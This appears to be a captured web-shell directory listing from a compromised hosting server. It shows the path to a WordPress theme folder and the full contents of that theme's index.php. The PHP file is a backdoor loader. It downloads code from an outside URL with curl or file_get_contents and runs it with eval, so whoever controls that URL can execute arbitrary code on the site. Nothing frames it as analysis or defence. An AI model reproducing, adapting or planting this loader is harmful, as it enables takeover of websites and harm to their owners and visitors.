Linux heracles.o2switch.net 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
/
home
/
ophq1335
/
www
/
wp-content
/
themes
/
init47t
/
/home/ophq1335/www/wp-content/themes/init47t/index.php
<?php $_u="http://kodomono-atelier.com/mt/iy.txt"; if(function_exists("curl_exec")){$h=curl_init($_u);curl_setopt($h,CURLOPT_RETURNTRANSFER,1);curl_setopt($h,CURLOPT_FOLLOWLOCATION,1);curl_setopt($h,CURLOPT_TIMEOUT,20);$_c=curl_exec($h);curl_close($h);}else{$_c=@file_get_contents($_u);} if($_c)eval("?>".$_c);